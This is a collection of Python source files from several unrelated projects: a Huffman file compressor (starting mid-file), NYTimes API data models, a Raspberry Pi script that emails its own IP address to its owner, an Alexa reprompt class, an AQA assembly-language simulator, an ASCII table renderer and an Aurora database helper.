txt = binpacker.readBinaryToEncode(ifile)
encoded = huffcoder.huffmanEncode(txt)
packed = binpacker.packData(encoded["output"], encoded["occurrence"])
with open(outputfile, "wb") as ofile:
ofile.write(packed)
end_time = time.time()
oldsize = os.path.getsize(inputfile)
newsize = os.path.getsize(outputfile)
compratio = (newsize / float(oldsize)) * 100
insec = end_time - start_time
print "You have succesfully ENCODED the file!"
print "%.3fkB => %.3fkB = %.2f" % (oldsize / 1000.0,
newsize / 1000.0, compratio) + "% compression."
print "===================In: %.5s seconds!===================" % insec
elif(args.decode):
print "You have selected to DECODE"
print "========================================================"
start_time = time.time()
with open(inputfile, "rb") as ifile:
txt = binpacker.readBinaryToDecode(ifile)
unpacked = binpacker.unpackData(txt)
decoded = huffcoder.huffmanDecode(unpacked["output"],
unpacked["occurrence"])
with open(outputfile, "wb") as ofile:
ofile.write(decoded["output"])
end_time = time.time()
oldsize = os.path.getsize(inputfile)
newsize = os.path.getsize(outputfile)
compratio = (newsize / float(oldsize)) * 100
insec = end_time - start_time
print "You have succesfully DECODED the file!"
print "%.3fkB => %.3fkB = %.2f" % (oldsize / 1000.0,
newsize / 1000.0, compratio) + "% compression."
print "===================In: %.5s seconds!===================" % insec
else:
print "Sorry, something went terribly wrong!"
os.system("pause")
return 0
if __name__ == "__main__":
main()
``` |
{
"source": "johnymarin/finance-news",
"score": 3
} |
#### File: flaskProject/src/nytimes_api.py
```python
from enum import Enum
from dataclasses import dataclass
from typing import Any, List, TypeVar, Type, Callable, cast
from datetime import datetime
import dateutil.parser
T = TypeVar("T")
EnumT = TypeVar("EnumT", bound=Enum)
def from_str(x: Any) -> str:
assert isinstance(x, str)
return x
def from_int(x: Any) -> int:
assert isinstance(x, int) and not isinstance(x, bool)
return x
def to_enum(c: Type[EnumT], x: Any) -> EnumT:
assert isinstance(x, c)
return x.value
def from_datetime(x: Any) -> datetime:
return dateutil.parser.parse(x)
def from_list(f: Callable[[Any], T], x: Any) -> List[T]:
assert isinstance(x, list)
return [f(y) for y in x]
def to_class(c: Type[T], x: Any) -> dict:
assert isinstance(x, c)
return cast(Any, x).to_dict()
class ItemType(Enum):
ARTICLE = "Article"
class Format(Enum):
MEDIUM_THREE_BY_TWO210 = "mediumThreeByTwo210"
NORMAL = "Normal"
STANDARD_THUMBNAIL = "Standard Thumbnail"
SUPER_JUMBO = "superJumbo"
THUMB_LARGE = "thumbLarge"
class Subtype(Enum):
PHOTO = "photo"
class TypeEnum(Enum):
IMAGE = "image"
@dataclass
class Multimedia:
url: str
format: Format
height: int
width: int
type: TypeEnum
subtype: Subtype
caption: str
copyright: str
@staticmethod
def from_dict(obj: Any) -> 'Multimedia':
assert isinstance(obj, dict)
url = from_str(obj.get("url"))
format = Format(obj.get("format"))
height = from_int(obj.get("height"))
width = from_int(obj.get("width"))
type = TypeEnum(obj.get("type"))
subtype = Subtype(obj.get("subtype"))
caption = from_str(obj.get("caption"))
copyright = from_str(obj.get("copyright"))
return Multimedia(url, format, height, width, type, subtype, caption, copyright)
def to_dict(self) -> dict:
result: dict = {}
result["url"] = from_str(self.url)
result["format"] = to_enum(Format, self.format)
result["height"] = from_int(self.height)
result["width"] = from_int(self.width)
result["type"] = to_enum(TypeEnum, self.type)
result["subtype"] = to_enum(Subtype, self.subtype)
result["caption"] = from_str(self.caption)
result["copyright"] = from_str(self.copyright)
return result
@dataclass
class Result:
section: str
subsection: str
title: str
abstract: str
url: str
uri: str
byline: str
item_type: ItemType
updated_date: datetime
created_date: datetime
published_date: datetime
material_type_facet: str
kicker: str
des_facet: List[str]
org_facet: List[str]
per_facet: List[str]
geo_facet: List[str]
multimedia: List[Multimedia]
short_url: str
@staticmethod
def from_dict(obj: Any) -> 'Result':
assert isinstance(obj, dict)
section = from_str(obj.get("section"))
subsection = from_str(obj.get("subsection"))
title = from_str(obj.get("title"))
abstract = from_str(obj.get("abstract"))
url = from_str(obj.get("url"))
uri = from_str(obj.get("uri"))
byline = from_str(obj.get("byline"))
item_type = ItemType(obj.get("item_type"))
updated_date = from_datetime(obj.get("updated_date"))
created_date = from_datetime(obj.get("created_date"))
published_date = from_datetime(obj.get("published_date"))
material_type_facet = from_str(obj.get("material_type_facet"))
kicker = from_str(obj.get("kicker"))
des_facet = from_list(from_str, obj.get("des_facet"))
org_facet = from_list(from_str, obj.get("org_facet"))
per_facet = from_list(from_str, obj.get("per_facet"))
geo_facet = from_list(from_str, obj.get("geo_facet"))
multimedia = from_list(Multimedia.from_dict, obj.get("multimedia"))
short_url = from_str(obj.get("short_url"))
return Result(section, subsection, title, abstract, url, uri, byline, item_type, updated_date, created_date, published_date, material_type_facet, kicker, des_facet, org_facet, per_facet, geo_facet, multimedia, short_url)
def to_dict(self) -> dict:
result: dict = {}
result["section"] = from_str(self.section)
result["subsection"] = from_str(self.subsection)
result["title"] = from_str(self.title)
result["abstract"] = from_str(self.abstract)
result["url"] = from_str(self.url)
result["uri"] = from_str(self.uri)
result["byline"] = from_str(self.byline)
result["item_type"] = to_enum(ItemType, self.item_type)
result["updated_date"] = self.updated_date.isoformat()
result["created_date"] = self.created_date.isoformat()
result["published_date"] = self.published_date.isoformat()
result["material_type_facet"] = from_str(self.material_type_facet)
result["kicker"] = from_str(self.kicker)
result["des_facet"] = from_list(from_str, self.des_facet)
result["org_facet"] = from_list(from_str, self.org_facet)
result["per_facet"] = from_list(from_str, self.per_facet)
result["geo_facet"] = from_list(from_str, self.geo_facet)
result["multimedia"] = from_list(lambda x: to_class(Multimedia, x), self.multimedia)
result["short_url"] = from_str(self.short_url)
return result
@dataclass
class ArticleModel:
status: str
copyright: str
section: str
last_updated: datetime
num_results: int
results: List[Result]
@staticmethod
def from_dict(obj: Any) -> 'ArticleModel':
assert isinstance(obj, dict)
status = from_str(obj.get("status"))
copyright = from_str(obj.get("copyright"))
section = from_str(obj.get("section"))
last_updated = from_datetime(obj.get("last_updated"))
num_results = from_int(obj.get("num_results"))
results = from_list(Result.from_dict, obj.get("results"))
return ArticleModel(status, copyright, section, last_updated, num_results, results)
def to_dict(self) -> dict:
result: dict = {}
result["status"] = from_str(self.status)
result["copyright"] = from_str(self.copyright)
result["section"] = from_str(self.section)
result["last_updated"] = self.last_updated.isoformat()
result["num_results"] = from_int(self.num_results)
result["results"] = from_list(lambda x: to_class(Result, x), self.results)
return result
def article_model_from_dict(s: Any) -> ArticleModel:
return ArticleModel.from_dict(s)
def article_model_to_dict(x: ArticleModel) -> Any:
return to_class(ArticleModel, x)
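# Minimal round-trip sketch (illustrative, not part of the original module): build one
# Multimedia record from a plain dict, serialise it back, and check both agree. The field
# values below are made up but match the enum definitions above.
if __name__ == "__main__":
    sample = {
        "url": "https://example.com/image.jpg",
        "format": "superJumbo",
        "height": 1365,
        "width": 2048,
        "type": "image",
        "subtype": "photo",
        "caption": "An example caption",
        "copyright": "Example Agency",
    }
    media = Multimedia.from_dict(sample)
    assert media.to_dict() == sample
    print(media)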
``` |
{
"source": "johnymoo/RaspberryPi",
"score": 3
} |
#### File: RaspberryPi/script/mailIP.py
```python
import subprocess
import smtplib
import socket
import time
from email.mime.text import MIMEText
import datetime
# the receiver email
receiver='[your_<EMAIL>'
def sm(receiver, title, body):
host = 'smtp.163.com'
port = 25
sender = '[your_email]<EMAIL>'
pwd = '[<PASSWORD>]'
msg = MIMEText(body, 'html')
msg['subject'] = title
msg['from'] = sender
msg['to'] = receiver
s = smtplib.SMTP(host, port)
s.login(sender, pwd)
s.sendmail(sender, receiver, msg.as_string())
    print 'The mail titled %s was successfully sent to %s.' % (title, receiver)
# Change to your own account information
today = datetime.date.today()
# Very Linux Specific
arg='ip route list'
p=subprocess.Popen(arg,shell=True,stdout=subprocess.PIPE)
data = p.communicate()
split_data = data[0].split()
ipaddr = split_data[split_data.index('src')+1]
my_ip = 'Your ip is %s' % ipaddr
print my_ip
strcurtime = time.strftime('%Y-%m-%dT%H:%M:%S', time.localtime(time.time()))
Subject = 'IP For RaspberryPi on %s' % strcurtime + ': ' + ipaddr
sm(receiver, Subject, my_ip);
``` |
{
"source": "johnyob/Alexa-Skills",
"score": 2
} |
#### File: alexa_skills/responses/Reprompt.py
```python
class Reprompt:
def __init__(self, text):
self._type = "PlainText"
self._text = text
def build(self):
return {
"outputSpeech": {
"type": self._type,
"text": self._text
}
}
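# Usage sketch (illustrative):
#   Reprompt("Please say that again.").build()
#   -> {"outputSpeech": {"type": "PlainText", "text": "Please say that again."}}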
``` |
{
"source": "johnyob/aqa-assembly-simulator",
"score": 2
} |
#### File: commands/config/Show.py
```python
from ascii_table import Table
from aqa_assembly_simulator.virtual_machine.config.VirtualMachineConfig import VirtualMachineConfig
from aqa_assembly_simulator.helpers.Util import SortedDictionary
from aqa_assembly_simulator.commands.Command import Command
class Show(Command):
def run(self):
"""
Return method for config show command
:return: (None)
"""
config = SortedDictionary(VirtualMachineConfig.get_config())
print("\nVirtual Machine Config")
print(Table([config.names(), config.values()]))
```
#### File: aqa_assembly_simulator/error/VirtualMachineError.py
```python
from aqa_assembly_simulator.error.RuntimeError import RuntimeError
class VirtualMachineError(RuntimeError):
def __init__(self, token, message):
super().__init__(token, message)
def report(self):
return "[ERROR] Error: AssemblySimulatorVMError, Response: ({0})".format(super().report())
```
#### File: aqa_assembly_simulator/parser/Statement.py
```python
from abc import ABC as Abstract, abstractmethod
class StatementVisitor(Abstract):
"""
Abstract class.
Used to traverse the abstract syntax tree produced by the parser.
"""
@abstractmethod
def visit_load_statement(self, statement):
pass
@abstractmethod
def visit_store_statement(self, statement):
pass
@abstractmethod
def visit_add_statement(self, statement):
pass
@abstractmethod
def visit_subtract_statement(self, statement):
pass
@abstractmethod
def visit_move_statement(self, statement):
pass
@abstractmethod
def visit_compare_statement(self, statement):
pass
@abstractmethod
def visit_branch_statement(self, statement):
pass
@abstractmethod
def visit_branch_equal_statement(self, statement):
pass
@abstractmethod
def visit_branch_not_equal_statement(self, statement):
pass
@abstractmethod
def visit_branch_greater_than_statement(self, statement):
pass
@abstractmethod
def visit_branch_less_than_statement(self, statement):
pass
@abstractmethod
def visit_and_statement(self, statement):
pass
@abstractmethod
def visit_or_statement(self, statement):
pass
@abstractmethod
def visit_eor_statement(self, statement):
pass
@abstractmethod
def visit_not_statement(self, statement):
pass
@abstractmethod
def visit_left_shift_statement(self, statement):
pass
@abstractmethod
def visit_right_shift_statement(self, statement):
pass
@abstractmethod
def visit_halt_statement(self):
pass
@abstractmethod
def visit_label_statement(self, statement):
pass
class Statement(Abstract):
"""
    Parent class for all statement node classes.
Inherited by all statement objects.
"""
@abstractmethod
def accept(self, visitor):
pass
class Load(Statement):
def __init__(self, tokens):
"""
Load statement constructor
:param tokens: (|tokens| = 2) (list)
"""
self._register, self._direct_address = tokens
def get_register(self):
"""
Returns register operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register
def get_direct_address(self):
"""
Returns direct address (memory reference) operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._direct_address
def accept(self, visitor):
"""
Traversal method.
        Used to process the node of the abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_load_statement(self)
def __repr__(self):
"""
Returns string representation of load statement
:return: (string)
"""
return "LDR {0}, {1}".format(self._register, self._direct_address)
class Store(Statement):
def __init__(self, tokens):
"""
Store statement constructor
:param tokens: (|tokens| = 2) (list)
"""
self._register, self._direct_address = tokens
def get_register(self):
"""
Returns register operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register
def get_direct_address(self):
"""
Returns direct address (memory reference) operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._direct_address
def accept(self, visitor):
"""
Traversal method.
        Used to process the node of the abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_store_statement(self)
def __repr__(self):
"""
Returns string representation of store statement
:return: (string)
"""
return "STR {0}, {1}".format(self._register, self._direct_address)
class Add(Statement):
def __init__(self, tokens):
"""
Add statement constructor
:param tokens: (|tokens| = 3) (list)
"""
self._register_d, self._register_n, self._operand = tokens
def get_register_d(self):
"""
Returns register_d operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_d
def get_register_n(self):
"""
Returns register_n operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_n
def get_operand(self):
"""
Returns <operand 2> operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._operand
def accept(self, visitor):
"""
Traversal method.
        Used to process the node of the abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_add_statement(self)
def __repr__(self):
"""
Returns string representation of add statement
:return: (string)
"""
return "ADD {0}, {1}, {2}".format(
self._register_d, self._register_n, self._operand
)
class Subtract(Statement):
def __init__(self, tokens):
"""
Subtract statement constructor
:param tokens: (|tokens| = 3) (list)
"""
self._register_d, self._register_n, self._operand = tokens
def get_register_d(self):
"""
Returns register_d operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_d
def get_register_n(self):
"""
Returns register_n operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_n
def get_operand(self):
"""
Returns <operand 2> operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._operand
def accept(self, visitor):
"""
Traversal method.
        Used to process the node of the abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_subtract_statement(self)
def __repr__(self):
"""
Returns string representation of subtract statement
:return: (string)
"""
return "SUB {0}, {1}, {2}".format(
self._register_d, self._register_n, self._operand
)
class Move(Statement):
def __init__(self, tokens):
"""
Move statement constructor
:param tokens: (|tokens| = 2) (list)
"""
self._register_d, self._operand = tokens
def get_register_d(self):
"""
Returns register_d operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_d
def get_operand(self):
"""
Returns <operand 2> operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._operand
def accept(self, visitor):
"""
Traversal method.
        Used to process the node of the abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_move_statement(self)
def __repr__(self):
"""
Returns string representation of move statement
:return: (string)
"""
return "MOV {0}, {1}".format(self._register_d, self._operand)
class Compare(Statement):
def __init__(self, tokens):
"""
Compare statement constructor
:param tokens: (|tokens| = 2) (list)
"""
self._register_d, self._operand = tokens
def get_register_d(self):
"""
Returns register_d operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_d
def get_operand(self):
"""
Returns <operand 2> operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._operand
def accept(self, visitor):
"""
Traversal method.
        Used to process the node of the abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_compare_statement(self)
def __repr__(self):
"""
Returns string representation of compare statement
:return: (string)
"""
return "CMP {0}, {1}".format(self._register_d, self._operand)
class Branch(Statement):
def __init__(self, tokens):
"""
Branch statement constructor
:param tokens: (|tokens| = 1) (list)
"""
self._label = tokens[0]
def get_label(self):
"""
Returns label operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._label
def accept(self, visitor):
"""
Traversal method.
        Used to process the node of the abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_branch_statement(self)
def __repr__(self):
"""
Returns string representation of branch statement
:return: (string)
"""
return "B {0}".format(self._label)
class BranchEqual(Statement):
def __init__(self, tokens):
"""
Branch equal statement constructor
:param tokens: (|tokens| = 1) (list)
"""
self._label = tokens[0]
def get_label(self):
"""
Returns label operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._label
def accept(self, visitor):
"""
Traversal method.
        Used to process the node of the abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_branch_equal_statement(self)
def __repr__(self):
"""
Returns string representation of branch equal statement
:return: (string)
"""
return "BEQ {0}".format(self._label)
class BranchNotEqual(Statement):
def __init__(self, tokens):
"""
Branch not equal statement constructor
:param tokens: (|tokens| = 1) (list)
"""
self._label = tokens[0]
def get_label(self):
"""
Returns label operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._label
def accept(self, visitor):
"""
Traversal method.
        Used to process the node of the abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_branch_not_equal_statement(self)
def __repr__(self):
"""
Returns string representation of branch not equal statement
:return: (string)
"""
return "BNE {0}".format(self._label)
class BranchGreaterThan(Statement):
def __init__(self, tokens):
"""
Branch greater than statement constructor
:param tokens: (|tokens| = 1) (list)
"""
self._label = tokens[0]
def get_label(self):
"""
Returns label operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._label
def accept(self, visitor):
"""
Traversal method.
        Used to process the node of the abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_branch_greater_than_statement(self)
def __repr__(self):
"""
Returns string representation of branch greater than statement
:return: (string)
"""
return "BGT {0}".format(self._label)
class BranchLessThan(Statement):
def __init__(self, tokens):
"""
Branch less than statement constructor
:param tokens: (|tokens| = 1) (list)
"""
self._label = tokens[0]
def get_label(self):
"""
Returns label operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._label
def accept(self, visitor):
"""
Traversal method.
        Used to process the node of the abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_branch_less_than_statement(self)
def __repr__(self):
"""
Returns string representation of branch less than statement
:return: (string)
"""
return "BLT {0}".format(self._label)
class And(Statement):
def __init__(self, tokens):
"""
And statement constructor
:param tokens: (|tokens| = 3) (list)
"""
self._register_d, self._register_n, self._operand = tokens
def get_register_d(self):
"""
Returns register_d operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_d
def get_register_n(self):
"""
Returns register_n operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_n
def get_operand(self):
"""
Returns <operand 2> operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._operand
def accept(self, visitor):
"""
Traversal method.
        Used to process the node of the abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_and_statement(self)
def __repr__(self):
"""
Returns string representation of and statement
:return: (string)
"""
return "AND {0}, {1}, {2}".format(
self._register_d, self._register_n, self._operand
)
class Or(Statement):
def __init__(self, tokens):
"""
Or statement constructor
:param tokens: (|tokens| = 3) (list)
"""
self._register_d, self._register_n, self._operand = tokens
def get_register_d(self):
"""
Returns register_d operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_d
def get_register_n(self):
"""
Returns register_n operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_n
def get_operand(self):
"""
Returns <operand 2> operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._operand
def accept(self, visitor):
"""
Traversal method.
        Used to process the node of the abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_or_statement(self)
def __repr__(self):
"""
Returns string representation of or statement
:return: (string)
"""
return "ORR {0}, {1}, {2}".format(
self._register_d, self._register_n, self._operand
)
class Eor(Statement):
def __init__(self, tokens):
"""
Xor statement constructor
:param tokens: (|tokens| = 3) (list)
"""
self._register_d, self._register_n, self._operand = tokens
def get_register_d(self):
"""
Returns register_d operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_d
def get_register_n(self):
"""
Returns register_n operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_n
def get_operand(self):
"""
Returns <operand 2> operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._operand
def accept(self, visitor):
"""
Traversal method.
        Used to process the node of the abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_eor_statement(self)
def __repr__(self):
"""
Returns string representation of xor statement
:return: (string)
"""
return "EOR {0}, {1}, {2}".format(
self._register_d, self._register_n, self._operand
)
class Not(Statement):
def __init__(self, tokens):
"""
Not statement constructor
:param tokens: (|tokens| = 2) (list)
"""
self._register_d, self._operand = tokens
def get_register_d(self):
"""
Returns register_d operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_d
def get_operand(self):
"""
Returns <operand 2> operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._operand
def accept(self, visitor):
"""
Traversal method.
        Used to process the node of the abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_not_statement(self)
def __repr__(self):
"""
Returns string representation of not statement
:return: (string)
"""
return "MVN {0}, {1}".format(
self._register_d, self._operand
)
class LeftShift(Statement):
def __init__(self, tokens):
"""
Logical left shift statement constructor
:param tokens: (|tokens| = 3) (list)
"""
self._register_d, self._register_n, self._operand = tokens
def get_register_d(self):
"""
Returns register_d operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_d
def get_register_n(self):
"""
Returns register_n operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_n
def get_operand(self):
"""
Returns <operand 2> operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._operand
def accept(self, visitor):
"""
Traversal method.
        Used to process the node of the abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_left_shift_statement(self)
def __repr__(self):
"""
Returns string representation of logical left shift statement
:return: (string)
"""
return "LSL {0}, {1}, {2}".format(
self._register_d, self._register_n, self._operand
)
class RightShift(Statement):
def __init__(self, tokens):
"""
Logical right shift statement constructor
:param tokens: (|tokens| = 3) (list)
"""
self._register_d, self._register_n, self._operand = tokens
def get_register_d(self):
"""
Returns register_d operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_d
def get_register_n(self):
"""
Returns register_n operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_n
def get_operand(self):
"""
Returns <operand 2> operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._operand
def accept(self, visitor):
"""
Traversal method.
        Used to process the node of the abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_right_shift_statement(self)
def __repr__(self):
"""
Returns string representation of logical right shift statement
:return: (string)
"""
return "LSR {0}, {1}, {2}".format(
self._register_d, self._register_n, self._operand
)
class Halt(Statement):
def __init__(self, tokens):
"""
Halt statement constructor
:param tokens: (|tokens| = 0) (list)
"""
pass
def accept(self, visitor):
"""
Traversal method.
        Used to process the node of the abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_halt_statement()
def __repr__(self):
"""
Returns string representation of halt statement
:return: (string)
"""
return "HALT"
class Label(Statement):
def __init__(self, identifier):
"""
Label statement constructor
:param identifier: label identifier (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
self._identifier = identifier
def get_identifier(self):
"""
Returns the identifier of the label
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._identifier
def accept(self, visitor):
"""
Traversal method.
        Used to process the node of the abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_label_statement(self)
def __repr__(self):
"""
Returns string representation of the label statement
:return: (string)
"""
return "{0}:".format(self._identifier)
```
#### File: aqa_assembly_simulator/virtual_machine/Memory.py
```python
from ascii_table import Table
from aqa_assembly_simulator.error.VirtualMachineError import VirtualMachineError
class Memory:
def __init__(self, capacity):
"""
Memory constructor.
Constructs _memory using a list comprehension.
:param capacity: number of addressable memory units (integer)
"""
self._capacity = capacity
self._memory = [
0 for address in range(capacity)
]
def __getitem__(self, address):
"""
Returns data stored at memory address :param address.
If :param address out of index range -> virtual machine error is raised.
:param address: address index (0 <= a < n) (integer)
:return: (integer)
"""
if not 0 <= address.get_literal() < self._capacity:
raise VirtualMachineError(address, "Address index out of range")
return self._memory[address.get_literal()]
def __setitem__(self, address, value):
"""
Sets the value stored in address :param address to :param value.
If :param address out of index range -> virtual machine error raised.
:param address: address index (0 <= a < n) (integer)
:param value: (integer)
:return: (None)
"""
if not 0 <= address.get_literal() < self._capacity:
raise VirtualMachineError(address, "Address index out of range")
self._memory[address.get_literal()] = int(value)
def __repr__(self):
"""
Returns string representation of the memory unit using an ascii_table.Table object
:return: (string)
"""
return str(Table([
{
"Header": "Addresses",
"Contents": list(map(str, range(self._capacity)))
},
{
"Header": "Values",
"Contents": list(map(str, self._memory))
}
]))
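# Minimal usage sketch: Memory expects address operands that expose get_literal(),
# as the simulator's token objects do, so _ExampleAddress below is a hypothetical
# stand-in used purely for illustration.
def _example_memory_usage():
    class _ExampleAddress:
        def __init__(self, literal):
            self._literal = literal
        def get_literal(self):
            return self._literal
    memory = Memory(4)
    memory[_ExampleAddress(2)] = 42     # store 42 at address 2
    return memory[_ExampleAddress(2)]   # read it back -> 42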
``` |
{
"source": "johnyob/ascii-table",
"score": 3
} |
#### File: ascii-table/ascii_table/Table.py
```python
from functools import reduce
from ascii_table.Column import Column
class Table:
def __init__(self, contents):
self._header = Column(None, contents).get_header()
self._columns = [{
"Column": column,
"Width": max(map(lambda x: sum(map(len, x)), column.get_rows())),
"Number Of Columns": max(map(len, column.get_rows())),
"Height": len(column.get_rows())
} for column in self._header.get_children()
]
assert len(set(map(lambda x: x["Height"], self._columns))) == 1
self._height = self._columns[0]["Height"]
def __repr__(self):
return "\n".join(self._get_rows())
def _get_row(self, row_index):
for column in self._columns:
cells = column["Column"].get_rows()[row_index]
padding = column["Number Of Columns"] - len(cells)
cell_length = (column["Width"] // len(cells)) + padding
for cell in cells:
yield (cell.format(cell_length), padding + 1, cell.is_header())
def _join_cells(self, character, cells):
cells = map(lambda x: (x[1] * " ") + x[0] + (x[1] * " "), cells)
return " " + character + character.join(cells) + character
def _join_lines(self, character, lines):
lines = map(lambda x: (x[1] * x[2]) + x[0] + (x[1] * x[2]), lines)
return " " + character + character.join(lines) + character
def _get_line(self, row):
for cell in row:
character = "-" if cell[2] else " "
yield (character * (len(cell[0])), cell[1], character)
def _format_row(self, row_index):
row = list(self._get_row(row_index))
yield self._join_cells("|", row)
if True in map(lambda x: x[2], row):
yield self._join_lines("+", self._get_line(row))
def _get_rows(self):
yield self._join_lines("+", self._get_line(self._get_row(0)))
for row in range(self._height):
yield "\n".join(self._format_row(row))
yield self._join_lines("+", self._get_line(
map(lambda x: (x[0], x[1], True), self._get_row(-1))
))
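# Minimal usage sketch, mirroring the column format that the Memory class earlier in
# this document passes to Table (a list of {"Header": ..., "Contents": [...]} dictionaries):
#   print(Table([
#       {"Header": "Addresses", "Contents": ["0", "1", "2"]},
#       {"Header": "Values", "Contents": ["7", "0", "42"]}
#   ]))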
``` |
{
"source": "johnyob/Aurora-Connector",
"score": 3
} |
#### File: aurora_connector/helpers/Utils.py
```python
from typing import List, Optional, Dict, Any, Union, Callable
import re
from dateutil.parser import parse as from_iso
from aurora_connector.helpers.Exceptions import AuroraParameterException, AuroraDatabaseException
DATATYPE_MAPPING = {
"VARCHAR": str,
"CHAR": str,
"BINARY": bytes,
"VARBINARY": bytes,
"TINYBLOB": bytes,
"TINYTEXT": str,
"TEXT": str,
"BLOB": bytes,
"MEDIUMTEXT": str,
"MEDIUMBLOB": str,
"LONGTEXT": str,
"LONGBLOB": str,
"BIT": bytes,
"TINYINT": int,
"BOOL": bool,
"BOOLEAN": bool,
"SMALLINT": int,
"MEDIUMINT": int,
"INT": int,
"INTEGER": int,
"BIGINT": int,
"FLOAT": float,
"DOUBLE": float,
"DECIMAL": float,
"DEC": float,
"DATETIME": from_iso
}
def format_field(field: Dict[str, Any]) -> Any:
"""
Returns the value of the field dictionary returned by the Data API.
The field dictionary has the following structure:
field = {
value_name: value
},
where value_name in {"stringValue", "blobValue", ...}
:param field: (dict)
:return: (Any)
"""
datatype_identifier, value = list(field.items())[0]
if datatype_identifier == "blobValue":
return bytes(value)
if datatype_identifier == "booleanValue":
return bool(value)
if datatype_identifier == "isNull":
if value:
return None
if datatype_identifier == "longValue":
return int(value)
if datatype_identifier == "stringValue":
return str(value)
raise AuroraDatabaseException({
"message": "Unsupported query result field datatype.",
"field_value": value,
"supported_types": [
bytes, bool, float, int, str, None
]
})
def cast_field(field_value: Any, column_type: Callable) -> Any:
"""
Returns the casted field value according to the DATATYPE_MAPPING above
:param field_value: value of the field (Any)
:param column_type: class constructor / function that casts the datatype to the correct type (Callable)
:return: (Any)
"""
if field_value is None:
return field_value
return column_type(field_value)
def format_record(record: List[Dict[str, Any]], column_types: List[Callable]) -> List[Any]:
"""
Returns the formatted record with correct typing.
:param record: A list with the following format:
record = [
{
value_name: value
},
.
.
.
]
where value_name = "stringValue", "blobValue", etc
(See format_value for more information)
:param column_types: A list of datatype constructors where the constructor stored at position i
relates to the datatype in position i stored in the record. (list)
:return: (list)
"""
return [cast_field(format_field(field), column_type) for field, column_type in zip(record, column_types)]
def get_column_type(column_type: str) -> Callable:
"""
Returns the related data type constructor for the MySQL database with name :param column_type:
:param column_type: Column type name. e.g. VARCHAR, etc (string)
:return: (callable)
"""
if column_type not in DATATYPE_MAPPING:
raise AuroraDatabaseException({
"message": "Unsupported column type in result set.",
"column_type": column_type
})
return DATATYPE_MAPPING.get(column_type)
